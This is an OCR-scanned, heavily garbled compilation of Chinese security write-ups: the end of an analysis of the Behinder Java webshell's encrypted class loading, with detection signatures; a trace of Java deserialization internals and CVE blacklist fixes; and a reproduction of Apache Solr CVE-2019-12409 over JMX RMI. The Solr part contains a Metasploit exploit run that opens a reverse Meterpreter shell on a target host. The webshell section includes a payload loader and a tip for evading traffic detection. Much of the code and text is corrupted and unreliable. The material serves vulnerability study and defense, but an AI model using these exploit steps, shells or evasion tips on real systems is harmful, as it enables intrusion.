¢ java.nio.ByteBuffer «(i 


^f 





执行 编译 好 的 class 代码 : 




















package net.rebeyond; 
import sun.misc.BASE64Decoder; 











public class Demo { 
public static class Myloader extends ClassLoader // 继 承 ClassLoader 




















{ 
public Class get(byte[] b) 
{ 
MA return super.defineClass(b, 8, b.length); 
ill i | } 
I ) 


public static void main(String[] args) throws Exception ( 
// TODO Auto-generated method stub 
ll String classStrs"yv66vgAAADQAKACAAgEAFW51dC9yZWJ leW9uZC9SZWJleW9uZACcABAEAEGphdmE vbGFUZy' 
| BASE64Decoder code=new sun.misc.BASE64Decoder(); 
Class result=new Myloader().get(code.decodeBuffer(classStr));//#baseosheigmbytew A, 
UNA System.out.printin(result.newInstance().toString()); 





服务 端 动态 解密 与 执行 : 
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import javax.crypto. 
import javax.crypto. 








public class Decrypt 
1 


public static byte[] £ncryptíbyte[? 
y.getBytes("utt-8"); 
new SecretKeySpec(raw, 


ECB/PKCS 


byte[] raw = ke 
SecretKeySpec skeySpec = 


Cipher cipher = Cipher.getInstance( AES 
cipher.init(1, skeySpec); 
return cipher.doFinal(bs); 


public static byte[] EncryptF Or Caen (BYES bs, String key) throws Exception 


byte[] raw = key.getBytes(": 8 
= new IvParameterSpec(raw); 


new SecretKeySpec(raw, “AE 


IvParameterSpec iv = 


SecretKeySpec skeySpec = 


spec. IvParameterSpec; 
spec. SecretKeySpec; 
" D 





bs, String key) throws Exception 








Cipher cipher = Cipher. CENE AES/CBC PKCSSPadding" m 


cipher.init(1, skeySpec, iv); 
return cipher.doFinal(bs); 


public static byte[] EncryptForPhp( bytet] 
byte[] raw = key.getBytes("ut* 
SecretKeySpec skeySpec = new 
Cipher cipher = Cipher.getInstance( "AES 





Secr on "RES 


] bs, String key) throws E 





cipher.init(1, skeySpec, new IvParameter "ndn byte[16])); 


return cipher.dofinal(bs); 


Y 


public static byte[] EncrypttorAsp(byte[] bs, String key) throws 


for (int i = 8; i « bs.length; i++) 


1 


交互 构造 : 


类 的 toString 方 法 来 作为 我 们 的 Payload 执 行 入 口 
s 方 法 与 servlet 的 内 置 对 象 Request、Response、Seesion 等 servlet 相 关 对 象 传递 


Loader 的 构造 函数 ， 传 递 一 个 指定 的 ClassLoader 实 例 进 去 (ClassLoader 来 
ss 出 来 的 类 与 Request、Response、Seesion 这 些 类 的 ClassLoader 不 是 同一 个 ， 所 以 在 
方 间 这 些 类 会 出 现 java.lang.ClassNotFoundException 异 常 ) 
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on 





获 iepa PLS " Uli e T aL 


Sere WO TETTE ( E féwebshelii i4 fl 
Spi uy f Ex t PE 
vi nc p ex au Ae de ^ni abu uc e LU p 


基于 GET 请 求 包 的 检测 特征 : 


1. url 包 含 .php?pass= ; (密码 如 果 被 修改 后 ， 此 检测 特征 无 效 ) 
2. 请 求 body 包 含 Content-Length: 16 


基于 GET 响 应 包 的 检测 特征 : 返回 16 位 密 钥 
基于 POST 请 求 包 的 检测 特征 : Content-Type: application/octet-stream 
基于 POST 响应 包 的 检测 特征 : Transfer-Encoding: chunked 


百度 的 OpenRASP 可 以 通过 命令 执行 的 堆栈 日 志 识别 冰 蝎 (安装 自 带 插件 即 可 看 到 日 志 ) ， 日 志 中 会 看 到 应 
堆栈 跟踪 活动 记录 。 


RABAT SWB S HRI IT, B JSPR RE V ClassLoader + defineClass 方 法 来 文 现 eva 特 性 ， 








e readiine e s 
RATMBBAES WERE, RHESSTWAFEBIDSSICLIEGA, IBESETCPRURISESIODenRASP, FREEBIE EE (安装 999-event-log 
时 可 看 到 日 志 } : 
[event-logger] Listing directory content: 
fevent-logger] Execute command: whoami 
java.lang.ProcessBuilder.start 


针对 现 有 流量 层 检 测 设备 的 bypass tip 思 路 


自行 实现 一 套 私有 算法 ， 对 流量 进行 加 解密 , 比如 用 python 实现 ， 对 菜刀 进行 流量 中 转 代理 等 押 
作 ; 


结束 语 


好 了 ， 这 里 就 是 近 几 年 大 多 数 java shell 的 演变 及 对 抗 过 程 ， 欢 迎 大 家 多 多 交流 。 后 续 根 据 实 
况 ， 与 大 家 交流 关于 webshell 后 渗透 维权 的 姿势 。 
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jaVa 反 序列 化 过 程 深究 
0x01 概述 


四 联网 目 大 家 针对 Java 反 序列 化 的 讨论 有 很 多 了 ， 但 是 这 里 我 还 是 想 聊 聊 ， 这 里 仅仅 记录 一 下 自己 
的 学 习 笔记 ， 之 前 我 在 中 讨论 了 为 什么 ， 通 过 重 写 readobject 方法 会 导致 反 序 
列 侯 的 问题 ， 当 然后 续 整 个 过 程 我 们 也 没 继续 ， 当 然 现在 继续 回来 讨论 这 个 事情 。 


0x02 反 序列 化 过 程 


这 里 需要 配合 我 们 的 反 序列 化 字 节 流 里 面 的 数据 来 看 。 


jar SerializationDumper-v1.1.jar "ACED90057372000A4F626A65637443616C6333 
33B0200007870" 


M MAGIC Oxac ed 
M VERSION - 0x00 05 


BJECT - 0x73 
CLASSDESC - 0x72 
lassName 
Length - 10 ~ 0x00 0a 
Value - ObjectCalc ~ 0x4f626a65637443616c63 
erialVersionUID — 0x33 73 1c 20 ac fO 18 3b 
'ewHandle 0x00 7e 00 00 
lassDescFlags ~ 0x02 - SC SERIALIZABLE 
fieldCount - 0 — 0x00 00 
lassAnnotations 
TC ENDBLOCKDATA ~ 0x78 
superClassDesc 
TC NULL - 0x70 





代理 等 操 ewHandle 0x00 7e 00 01 
lassdata 
ObjectCalc 
values 
根据 实际 情 
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exec:347, Runtime (java, lang) > j 
readObject:11, ObjectCalc 

invoke0:-1, NativeMethodAccessorImpl (sun.reflect) 
invoke:62, NativeMethodAccessorImpl (sun.reflect) 
invoke:43, DelegatingMethodAccessorImpl (sun.reflect) 
invoke:497, Method (java.lang.reflect) 
invokeReadObject:1017, ObjectStreamClass (java.io) 
readSerialData:1896, ObjectInputStream (java.io) 
readOrdinaryObject:1801, ObjectInputStream (java.io) 
readObject0:1351, ObjectInputStream (java.io) 
readObject:371, ObjectInputStream (java.io) 

main:11, unSerializableCalc 











在 ObjectinputStream#readObjectO ， 会 根据 tc 的 byte 值 进入 switch 中 ， 选 择 相关 的 c 
行 下 一 步 操作 。 回 到 之 前 反 序 列 化 字 节 流 中 ， 我 们 可 以 看 到 这 里 的 TC OBJECT 为 0x73， 所 
里 会 进入 case 为 TC OBJECT 中 readOrdinaryObject 的 进行 字 节 流 的 处 理 。 


STREAM_MAGIC - Oxac ed 
STREAM VERSION - 0x00 05 
Contents 
TC OBJECT - 0x73 
TC CLASSDESC - 0x72 
className 
Length - 10 - 9x00 9a 
Value - ObjectCalc - 0x4f626a65637443616c63 
serialVersionUID - 0x33 73 1c 20 ac fO 18 3b 
newHandle 0x00 7e 00 00 
classDescFlags - 0x02 - SC SERIALIZABLE 
fieldCount - © - 0x00 00 
classAnnotations 
TC ENDBLOCKDATA - 0x78 
superClassDesc 
TC NULL - 0x70 
newHandle 0x00 7e 00 01 
classdata 
ObjectCalc 
values 






























































































































































































































































376 


相关 的 case yi 
0x73， 所 以 这 







td 
(ttt = bin. peekByte()) = 7 
. readByte() 
handleReset() 


(te) { 
go mu 


FERENCE : 


readHand le(unshared) 


readC Lass (unshared) ; 


readC lassDesc(unshared) 


RING: 


checkResolve(readString(unshared) ) 


checkResolve( readArray(unshared) ) 


checkResolve( readEnum( unshared) ) 





feet readOrdinaryObject ， 在 readOrdinaryObject 中 会 根据 字 节 流 中 的 下 一 个 关键 字 
TC CLASSDESC 进行 相关 处 理 ， 这 个 TC_CLASSDESC 是 一 个 类 描述 符 标识 ， 我 们 可 以 看 到 
TC-CLASSDESC 中 的 classname 的 value 正 是 我 们 前 面 测试 代码 中 的 ObjectCalc 这 个 类 名 字 。 


TC CLASSDESC - 0x72 
className 
Length - 10 - 0x00 Oa 
Value - ObjectCalc - 0x4f626a65637443616c63 


而 处 理 正 述 这 些 东西 的 方法 自然 是 readClassDesc ， 这 里 画 个 重点 ， 下 面 反 序列 化 的 一 些 修复 方 
渤 基 实 和 这 个 里 面 的 一 些 有 关系 ， 当 然 这 里 面 还 有 个 TC PROXYCLASSDESC 引起 了 我 的 注意 ， 
X^ TC PROXYCLASSDESC 是 代理 类 描述 符 ， 看 到 代理 类 这 三 个 字 相信 熟悉 反 序列 化 的 朋友 
利加 能 未 会 卫生， 当然 不 太 熟悉 的 朋友 可 以 了 解 一 下 ysoserial 这 个 项 目 ， 这 个 项 目 中 大 量 使 用 了 
入 代理 方式 ， 这 种 方式 反 序列 化 利用 本 次 不 会 深入 探讨 ， 所 以 话说 回来 。 








'readürdinaryObject * ; 


private t(boolean 






{ 
if (bin.readByte() != TC_OBJECT) { 
throw new InternalError(); 
} 
ObjectStreamClass desc = readClassDesc(faise); 
desc.checkDeserialize(); 
private ObjectStreamClass boolean 
throw ti 
{ 
byte tc = bin. peekByte(); 
| switch (tc) { 
| case TC NULL: 
| return (ObjectStreamClass) readNull(); 
Ili 
| case TC REFERENCE: 
| | return (ObjectStreamClass) readHandle(unshared) ; 
I 
case TC PROXYCLASSDESC: 
| return readProxyDesc(unshared); 
| 
| 
| | case TC_CLASSDESC: 
Ilii return readNonProxyDesc(unshared) ; 
I 
I default: 
throw new StreamCorruptedException( 
String. format("invalid type code: *X02X", tc)); 
} 
} 


这 里 我 们 分 别 跟 进 一 下 readProxyDesc 和 readNonProxyDesc 方法 ， 首 先 跟 进 
readNonProxyDesc 方法 ， 我 删除 部 分 代码 ， 可 以 看 看 下 面 代码 中 的 resolveClass ， 
resolveClass 处 理 的 readDesc 正 是 我 们 要 利用 的 一 个 类 OjectClac 。 
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a Bvate ObjectStr: lass re boolean zh 


ClassNotFoundException resolveEx - 
bin.setBlockDataMode(trus); 
final b checksRequired - isCustomSubclass(); 
try ( 
if ((cl = resolveClass(readDesc)) == null) { 
resolveEx = new ClassNotFoundException( "nu! ] )5 
) else if (checksRequired) ( 
ReflectUtil.checkPackageAccess(cl); 


v & readDesc {ObjectStreamClass@500} "ObjectCak tatic final long serialVersion| 


* null 





跟 进 resolveClass 方法 ， 可 以 看 到 通过 Class.forName 方法 反射 调用 我 们 的 利用 类 
Calc 。 


Protected Class<?> resolveClass(ObjectStreamClass desc) 
throws IOException, ClassNotFoundException 


String name = desc.getName(); 
try { 
return Class.forName(name, false, latestUserDefinedLoader()); 


3 readProxyDesc 这 个 类 ， 其 实 readProxyDesc 和 readNonProxyDesc 在 写法 上 会 发 
» E—AY SIRE resolveProxyClass 这 个 类 上 。 


lliVate objects! 


throws 


ObjectStrea = new ObjectStreamClass(); 
try ( 
if ((cl = resolveProxyClass(ifaces)) == null) { 
resolveEx = new ClassNotFoundException( ‘null class"); 
} 
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跟 进 resolveProxyClass rh, 这 个 方 法 最 后 会 调用 Proxy. getProxyClass 来 处 理 ， 比 如 获 
类 这 些 操作 6 





tected Class<?> resolveProxyClass(String[] interfaces) 
throws IOException, ClassNotFoundException 


return Proxy.getProxyClass( 
hasNonPublicInterface ? nonPublicLoader : latestLoader, 
classObjs); 


Pops readProxyDesc 或 者 readNonProxyDesc 处 理 之 后 实际 上 完成 了 类 的 实例 化 ,也 
径 过 readClassDesc 处 理 之 后 ， 完 成 了 类 的 实例 化 ， 代 码 继续 向 下 处 理 ， 标 记 了 一 些 注释 ， 
ia 进入 到 readSerialData 中 。 


private Object boolean 
throws IOExcept 
ObjectStreamClass desc - readClassDesc(false); 
desc.checkDeserialize(); 






Class<?> cl = desc.forClass(); 
Object obj; 


try ( 
obj = desc.isInstantiable() ? desc.newInstance() : null; T 
} 
if (desc,isExternalizable()) { )18 
readExternalData((Externalizable) obj, desc); 
) eise ( 


readSerialData(obj, desc); 





f£ readSerialData 中 有 一 个 slotDesc.hasReadObjectMethod 判断 ， 而 我 们 在 《Java 反 序列 
深究 》 讨 论 过 就 是 它 判 断 是 否 反 序 列 化 ， 跟 进 hasReadObjectMethod 实际 上 是 判断 
readObjectMethod 是 否 为 null， 并 且 结果 是 boolean 型 。 
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| 比如 获取 yoc hasRead 4ethod() { . ø mc 



















adObjectMethod 如 何 来 的 ， 实 际 上 需要 追溯 到 前 面 readClassDesc 和 
ProxyDesc 中 ， 实 际 上 ， 这 两 个 方法 实例 化 类 之 后 ， 都 有 一 个 desc.initNonProxy 构造 


der, 
if ((cl = resolveClass(readDesc)) == null) { 
q resolveEx = new ClassNotFoundException("null class"); 
ME, 也 就 说 } else if (checksRequired) { 
bR, 这 里 P ReflectUtil.checkPackageAccess(cl); 
} 


} catch (ClassNotFoundException ex) { 
resolveEx = ex; 


} 
skipCustomData(); 


desc.initNonProxy(readDesc, cl, resolveEx, readClassDesc(false)); 


tinputst 
try { 
if ((cl = resolveProxyClass(ifaces)) == null) { 

resolveEx = new ClassNotFoundException( null class"); 
} else if (!Proxy.isProxyClass(cl)) { 

throw new InvalidClassException("Not a proxy"); 
} else { 


Ref lectUtil.checkProxyPackageAccess( 
getClass().getClassLoader(), 
cl.getInterfaces()); 

} 


° } catch (ClassNotFoundException ex) { 
resolveEx = ex; 
} 


SkipCustomData(); 


desc.initProxy(cl, resolveEx, readClassDesc(false)); 


NonProxy 构造 方法 ， 实 际 上 这 两 个 方法 都 会 调用 lookup 方法 处 理 cl, m cl 实际 上 就 是 
化 的 那个 类 ， 在 这 个 例子 中 是 ObjectCalc 类 。 
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void LUN jectStreamClass model * 
throws InvalidClassException 
thiscl ssl: 
if (cl T= null) ( 
localDesc - lookup(cl, true); 
void 
throw 1 { 


if (cl l= null) { 
localDesc = lookup(cl, true); 






跟 进 lookup 在 实例 化 ObjectStreamClass ， 处 理 了 cl 对 象 ， 而 这 个 cl 在 我 们 这 里 面 就 是 
ObjectCalc 。 


static ObjectStreamClass l, boolean all) { 
if (!(all || Serializable.class.isAssignableFrom(cl))) { 
return null; 


if (entry == null) { 
try { 
entry = new ObjectStreamClass(cl); 
} catch (Throwable th) { 
entry = th; 


BR ObjectStreamClass ， 可 以 看 到 而 这 个 cl 在 我 们 这 里 面 就 是 ObjectCalc ， 而 这 里 会 有 个 
断 是 否 externalizable ， 这 个 属性 我 们 前 面 说 过 了 。 
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Ehis.cl = cl; 

name = cl.getName(); 

isProxy = Proxy.isProxyClass(cl); 

isEnum = Enum.class.isAssignableFrom(cl); 


if (serializable) { 


public Void { 


if (externalizable) { 


) eise { 


Void.TYPE); 


Vola TYPE), 


te static Method getPrivat 





try { 


meth.setAccessible(true); 
int mods = meth.getModifiers(); 


k ((mods & Modifier.STATIC) == 
i ((mods & Modifier.PRIVATE) != 
4 catch (NoSuchMethodException ex) { 

E return null; 


个 例子 为 例子 : 
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private Ob amClass(final Class«?» c1) f 


serializable = Serializable.class.isAssignableFrom(cl); 
externalizable = Externalizable.class.isAssignableFrom(cl); 


cons = getExternalizableConstructor(cl); 
cons = getSerializableConstructor(cl);: 


writeObjectMethod = getPrivateMethod(cl, 
new Class<?>[] { ObjectOutputStream.class }, 


ateMethod 方法 ， 可 以 看 到 他 会 对 一 些 属性 进行 判断 。 


Method meth = cl.getDeclaredMethod(name, argTypes); 


return ((meth.getReturnType() == returnType) && 
J) && 
0)) ? meth : 





AccessController.doPrivileged(new PrivilegedAction«Void»() { 


"writeObject" 


readObjectMethod = getPrivateMethod(cl, "reasdobject^, 
new Class<?>[] { ObjectInputStream.class }, 


null; 


readObjectMethod = getPrivateMethod(cl, '"readobject',new Class<?>[] { Obj 


。 方法 名 为 readObject 

。 返回 类 型 为 void 

。 传 入 参数 为 一 个 ObjectlnputStream.class 类 型 参数 
。 修饰 符 不 能 包含 static 

。 修饰 符 必须 包含 private 


所 以 说 满足 这 种 情况 下 才 会 进入 反 序 列 化 的 下 一 步 核心 slotDesc.invokeReadObject 中 ， F 
进入 defaultReadFields 进行 处 理 。 











ObjectStreamClass.ClassDataSlot[] slots = desc.getClassDataLayout() 
for (int i = 0; i < slots.length; i++) { 
ObjectStreamClass slotDesc = slots[i].desc; 


if (slots[i].hasData) { 


if (obj != null && 
slotDesc.hasReadObjectMethod() && 
handles.lookupException(passHandle) == null) 
{ 
SerialCallbackContext oldContext = curContext; 
ipd ae 
curContext = new SerialCallbackContext(obj, slotDes¢ 


bin. setBlockDataMode(true); 
slotDesc.invokeReadObject(obj, this); 
} catch (ClassNotFoundException ex) { 


J else i 


defaultReadFields(obj, slotDesc); 


跟 进 invokeReadObject ， 最 后 可 以 看 到 调用 readObjectMethod.invoke 实际 上 再 往 下 走 就 
些 反 射 方法 了 。 
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Manvokerea Object obj, ObjectInputStream in} © o 


IOException, 


Exception 








if (readObjectMethod != null) { 


try { 
readObjectMethod.invoke(obj, new Object[]{ in }); 


jectinputStream#readSerialData 中 ， 我 们 讨论 了 slots[i].hasData 为 true 的 情况 下 ， 
x^" if 为 false 的 时 候 来 到 的 是 slotDesc.invokeReadObjectNoData 。 


vate void 
Methrows IOException 


if (slots[i].hasData) { 
bin.setBlockDataMode( true); 
slotDesc.invokeReadObject(obj, this); 
} 
if (slotDesc.haswriteObjectData()) { 
skipCustomData(); 
) eise { 
bin.setBlockDataMode( false); 
} 
} else { 
if (obj != null && 
slotDesc.hasReadObjectNoDataMethod() && 
handles.lookupException(passHandle) -- nuil) 


slotDesc.invokeReadObjectNoData(obj); 


新 是 实际 是 根据 序列 化 的 时 候 是 不 是 重 写 了 readObjectNoData 来 进行 反 序列 化 。 


jectNoDataMethod = getPrivateMethod(cl, "readObjectNoData", null, Void.TYF 
hasWriteObjectData = (writeObjectMethod != null); 


| 前 面 讨论 readOrdinaryObject ， 我 们 讨论 了 序列 化 接口 不 是 Externalizable 类 型 ， 如 
目 然 会 进入 readExternalData 中 。 
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readOrdinarvObiect(boolean shar 








ObjectStreamcl 'sc = readClassDesc(false); 
desc.checkDeserialize(); 


Class«?» cl - desc.forClass(); 
Object obj; 
y { 


obj = desc.isInstantiable() ? desc.newInstance() : null; 


if (desc.isExternalizable()) 1 
readExternalData((Externalizable) obj, desc); 
) else { 


readSerialData(obj, desc); 





跟 进 readExternalData 方法 ， 这 个 方法 调用 了 obj.readExternal 进行 处 理 ， 也 就 是 说 构造 
payload 的 时 候 要 达到 这 个 触发 点 ， 需 要 用 writeExternal() 和 readExternal() 方 法 指定 一 个 
分 数据 进行 序列 化 与 反 序 列 化 。 





SerialCallbackContext oldContext = curContext; 
curContext = null; 
try { 
boolean blocked = desc.hasBlockExternalData(); 
if (blocked) { 
bin.setBlockDataMode( true); 
} 
if (obj != null) { 
try Y 
obj.readExternal(this); 


在 廖 师 传 的 反 序列 攻击 时 序 图 ， 补 充 了 一 些 我 的 理解。 
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ET 


ET 








resdSenalData() Af MextermotzonieA i 7) A CR 








vist doCalibacks()--»st.obj.vakdateObiect 





c tS TINA, DUBIE HEUS SHADES resolveProxyClass 和 
S 进行 的 修复 黑 名 单 处 理 。 


0 17-3248 
人 复方 式 针对 resolveProxyClass ， 进 行 java.rmi.registry.Registry 的 黑 名 单 拦截 。 


d Class<?> resolveProxyClass(String[] var1) throws IOException, ClassNot 
String[] var2 = vari; 
int var3 = vari.length; 


for(int var4 = 0; var4 < var3; ++var4) { 
String var5 = var2[var4]; 
if (var5.equals("java.rmi. y.Registry")) { 
throw new To proxy de 








return super.resolveProxyClass(var1); 
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CVE-2019-2890 


修复 方式 针对 resolveClass ， 进 行 黑 名 单 拦截 。 


Subject FeadSubject}(ObjectInputStream in) ClassNotFoundException, IOException + 
length = in. readInt() 
() bytes = {Length} 
in. readFully( bytes) 
(platformService != && platfomService.isServer()) { 
bytes = securityService != ? securityService.decrypt(bytes) : bytes 


) 


ByteArcayIonutStream bais = 5 ByteArrayvInoutSt ream( bytes) 
ObjectInputStream in2 = PersistenceSubjectHelper.WSFilteringObjectInputStream(bais) 
Subject subject = (Subjectin? readUb ject Ty 
in2.close() 
subject ani 
- eti 
WSFilteringObjectInputSt ream FilteringObjectinputStream + 
String firstClassName 


WSFilteringObjectInputStream({InputStream in) IOException { 
(in) 


Class«?» resolveClass(ObjectStreamClass descriptor) ClassNotFoundException, IOException 1 
Class clazz = .resolveClass(descriptor) 
{ "firstClassName == ) 4 
String className = descriptor. getName(} 


1 
clazz.asSubclass (Subject. ) 
TEXCEPTTON varsy 1 
InvalidClassExcept tont 


-firstClassName = className 


clazz 


所 以 实际 上 如 果 应 用 中 存在 反 序 列 化 漏洞 也 可 以 参考 这 种 方式 进行 拦截 。 


0x04 小 结 


作为 过 程 记 录 ， 筛 选 了 调用 栈 到 反射 之 前 的 基本 上 所 有 流程 记录 如 下 : 
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"7 


Apache Solr 不 安全 配置 远程 代码 执行 漏洞 复 现 及 jmx 
rmi 利 用 分 析 


起 因 


11 月 18 号 Apache Solr 官 方 更 新 了 一 个 安全 漏洞 公告 


修复 了 一 个 在 Linux 环 境 下 部 分 版 本 不 安全 配置 存在 远程 代码 执行 漏洞 ，CVE 编 号 : CVE-2019- 
12409。 影 响 linux 下 的 Apache Solr 8.1.1 和 8.2.0 版 本 。 在 Linux 下 的 环境 下 的 Apache Solr 84 
和 8.2.0 版 本 存在 默认 不 安全 配置 (ENABLE_REMOTE_JMX_OPTS="true") 


措 建 环境 


官网 j i) 下 载 8.2.0 的 solr 安装 包 


Index of /dist/lucene/solr/8.2.0 


Last modified Size Description 











Directory = 
2019-07-25 09:29 - 

QO-sre.tgz 2019-07-19 16:38 69M 

8.,2.0-src.tgz.asc 2019-07-19 16:38 833 





2019-07-19 16:38 149 
2019-07-19 16:38 173M 
2019-07-19 16:38 833 
2019-07-19 16:38 145 





2019-07-19 16:38 175M 
2019-07-19 16:38 833 





2019-07-19 16:38 145 


放 到 linux 服务 器 ， 解 压 进行 安装 。 
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eirdbird607: $ ls -al 


weirdbird@07 weirdbird@07 4096 

weirdbird007 weirdbird007 4096 

weirdbird@07 weirdbird007 4096 

weirdbird0907 weirdbird007 882555 CHANGES. txt 
weirdbird007 weirdbird007 ^ 4096 

weirdbird@@7 weirdbird907 4096 

weirdbird007 weirdbird007 4096 

weirdbird007 weirdbird@07 4096 

weirdbird007 weirdbird007 36864 

weirdbird007 weirdbird@07 12646 LICENSE.txt 
weirdbird@07 weirdbird@07 731038 LUCENE CHANGES. txt 
weirdbird@@7 weirdbird@07 27717 NOTICE. txt 
on weirdbird007 weirdbird907 7490 README. txt 
"a-xr-x 11 weirdbird@@7 weirdbird007 4096 

É j007Qweirdbird907: $ | 


ee N IU ON) IP UU) SI UO 


配置 开启 jmx 监控 


CHANGES. txt 


4096 Nov 19 
36864 Nov 
12646 Jul d LICENSE.txt 
731038 Jul 和 LUCENE CHANGES. t 
27717 Jul : NOTICE. txt 
r 7498 Jul z README. txt 
dbirdðð? 4096 Nov 


solr-8893.pid solr-8983.pid soir-9989-pid 





手工 开启 jmx 





ENABLE_REMOTE_JMX_ 


RMI_PORT= 


i $ cd bins 
eirdbirdee7?Gweirdbirdes?: $ ls 
install _solr_service.sh oom_solr.sh post solr solr-B8893.pid solr-8983.pid solr-9989.pid soir.cmd solr_conf.bak solr.in.cmd Sölr.in.sh 
ieirdbird087Qweirdbird887: $ ./solr start 
*+ [WARN] *** Your open file limit is currently 1024. 
It should be set to 65000 to avoid operational disruption. 
longer wish to see this warning, set SOLR ULIMIT CHECKS to false in your profile or solr.in.sh 
] #*** Your Max Processes Limit is currently 7636. 
be set to 65000 to avoid aperational disruption. 
longer wish to see this warning, set SOLR_ULIMIT_CHECKS to false in your profite or solr.in.sh 
to 180 seconds to see Solr running on port 8983 [/] 
Btarted Solr server on port 8983 (pid=1719), Happy searching! 


eirdbirdé97Gweirdbirdée7: $ netstat -anp | grep java 
Not all processes could be identified, non-owned process info 
will not be shown, you would have to be root to see it all.) 
a [IB m LISTEN 
8 9 127.0.0.1:7983 LISTEN 
L] e 35375 LISTEN 
0 0 8983 LISTEN 
2 i) STREAM CONNECTED 31405 1710/ 
2 {) STREAM CONNECTED 31422 1718/ 
eicdbicddQ7Qweirdbirde07: si 


该 漏洞 从 根本 上 还 是 基于 rmi 协 议 的 jmx 的 问题 。 


什么 是 jmx 


JMX 在 Java 编 程 语 言 中 定义 了 应 用 程序 以 及 网 络 管理 和 监控 的 体系 结构 、 设 计 模 式 、 应 用 程序 接 吕 
以 及 服务 。 通 常 使 用 JMX 来 监控 系统 的 运行 状态 或 管理 系统 的 某 些 方面 ， 比 如 清空 缓存 、 重 新 加 载 
配置 文件 等 
























个 自己 的 MBean, 首先 定义 1 个 接口 
five com.weirdbird.test.server; 
lic interface HelloMBean { 
public String getName(); 


public void setName(String newName); 
public String sayHello(); 


口 提供 实现 方法 


age com.weirdbird.test.server; 


€ class Hello implements HelloMBean { 

rivate String name = "MUNIU LABS"; 

/ getter/setter for the "name" attribute 
erride 

üblic String getName() ( return this.name; } 
Werride 


ublic void setName(String newName) { this.name = newName; } 


! Methods 


gementFactory.getPlatformMBeanServer 创建 
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package com.weirdbird.test.server; : » ) 7 


import java.lang.management.ManagementFactory; 
import javax.management.*; 


public class MBeanClient { 


public static void main(String[] args) throws Exception { 





// Connect to the MBean server of the current Java process 
MBeanServer server - ManagementFactory.getPlatformMBeanServer(); 
System.out.println( server.getMBeanCount() ); 


// Print out each registered MBean 
for ( Object object : server.queryMBeans(new ObjectName("*:*"), nu 
System,out.println( ((ObjectInstance)object).getObjectName() ) 


4: 注册 MBean 实例 


注册 MBean 实例 ， 然 后 利用 jconsole 就 可 以 连接 ， 这 就 是 1 个 基础 的 jmx demo . 
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BO) 















com.weirdbird.test.server.MBeanExample; » > 
som. weirdbird.test.server.*; 
com.weirdbird.test.server.Hello; 


R 


java.lang.management.ManagementFactory; 
javax.management . * ; 


‘class MBeanExample { 


blic static void main(String[] args) throws Exception { 


_// Create a new MBean instance from Hello (HelloMBean interface) 


- Hello mbean = new Hello(); 


_// Create an object name, 


- ObjectName mbeanName = new ObjectName(“com.weirdbird.test.server: type=He 


_ // Connect to the MBean server of the current Java process 
_ MBeanServer server = ManagementFactory.getPlatformMBeanServer(); 
- server.registerMBean(mbean, mbeanName); 


_// Keep the application running until user enters something 


~ System.out.println("Press any key to exit"); 
— System.in.read(); 
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m JConsole: 新 建 连接 





NO 新建 连接 








， 本 地 进程 (L): 
名 称 PID 
sun.tools.jconsole.JConsole 53681 


org.jetbrains.jps.cmdline.Launcher /Applicatio... 53522 
com.weirdbird.test.server.MBeanExample.MBe... 53523 





à . com.weirdbird.test.server.MBeanExample.MBeanExa 
org.jetbrains. kouin.aaemon.xounLompuevae... 334UD 


$ USF uk Lb 344 TO eto ER AATE A TE 
注 A DRAE TETUER 


远程 进程 (R): 


用 法 : <hostname>:<port> 或 service:jmx:<protocol>:<sap> 


用 户 名 (U): 口令 (P): 


连接 (C) 取消 


利用 方式 


13 年 ， 就 提出 过 针对 jmx rmi 的 攻击 利用 
Exploiting JMX RMI (| | ) Xploiting-j ) 


在 没有 安全 管理 器 的 情况 下 可 以 通过 javax.management.loading.MLet MBean 远程 创建 恶意 
利用 步骤 : 


1. 启动 一 个 远程 带 有 恶意 的 MLet and a JAR 的 web 服务 。 

2. 使 用 JMX 在 目标 服务 器 上 创建 MBean javax.management.loading. MLetSz fl i 

3. 调用 MBean 实 例 的 " getMBeansFromURL" 方 法 ， 我 们 部 署 的 Web 服 务 器 URL 作 为 参数 传 
JMX 服 务 将 连接 到 http 服 务 器 并 解析 MLet 或 者 jar 文 件 。 

4. JMX 服 务 下 载 并 加 载 MLet 文 件 中 引用 的 JAR 文 件 ， 从 而 使 恶意 MBean 可 通过 JMX 使 用 。 

5. 攻击 者 最 终 从 恶意 MBean 调 用 方法 进行 执行 shell 。 


现 有 github 开 源 的 
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m. e * > ? . 





用 方式 ， 可 直接 使 用 msf 的 exploit/multi/misc/java jmx server 模块 进行 直接 利用 ， 
Agit! ub 开源 的 mjet 项 目 进行 利用 执行 命令 。 
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msf5 payload(java/meterpreter/reverse tcp) > use exploit/multi/misc/jaya 
msf5 exploit(multi/misc/java_jmx_server) > set RhOSTS 172.16.194.138 
RhOSTS => 172.16.194.138 

msf5 exploit(multi/misc/java_jmx_server) > set rport 18983 

rport => 18983 

msf5 exploit(multi/misc/java_jmx_server) > show options 


Module options (exploit/multi/misc/java jmx server): 


Name Current Setting Required Description 

JMXRMI jmxrmi yes The name where the JMX RMI int 
JMX PASSWORD no The password to interact with 
JMX ROLE no The role to interact with ana 
RHOSTS 172.16.194.138 yes The target host(s), range CIDR 
RPORT 18983 yes The target port (TCP) 

SRVHOST 9.0.0.0 yes The local host to listen on. Th 
SRVPORT 8080 yes The local port to listen on. 
SSLCert no Path to a custom SSL certificat 
URIPATH no The URI to use for this exploit 


msf5 exploit(multi/misc/java jmx server) » run 


[*] Started reverse TCP handler on 172.16.194.1:4444 

[*] 172.16.194.138:18983 - Using URL: http://0.0.0.0:8080/jZ0Qb6ce83 

[*] 172.16.194.138:18983 - Local IP: http://198.18.0.1:8080/jZoQb6ce83 

[*] 172.16.194.138:18983 - Sending RMI Header... 

[*] 172.16.194.138:18983 - Discovering the JMXRMI endpoint... 

[*] 172.16.194.138:18983 - JMXRMI endpoint on 127.0.1.1:18983 

[*] 172.16.194.138:18983 - Proceeding with handshake... 

[*] 172.16.194.138:18983 - Handshake with JMX MBean server on 127.0.1.1:18983 
[*] 172.16.194.138:18983 - Loading payload... 

[^] 172.16.194.138:18983 - Replied to request for mlet 

[*] 172.16.194.138:18983 - Replied to request for payload JAR 

[*] 172.16.194.138:18983 - Executing payload... 

[*] Sending stage (53928 bytes) to 172.16.194.138 

[*] Meterpreter session 1 opened (172.16.194.1:4444 -» 172.16.194.138:58636) 
meterpreter > sysinfo 

Computer : weirdbird007 

Os : Linux 4.15.0-70-generic (amd64) 


Meterpreter : java/linux 

meterpreter > shell 

Process 1 created. 

Channel 1 created. 

id 

uid-1900(weirdbird007) gid-1000(weirdbird007) groups-1000(weirdbird007),4(adm)/* 
» 
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)» run 


TCP handler on 172,16,194. 
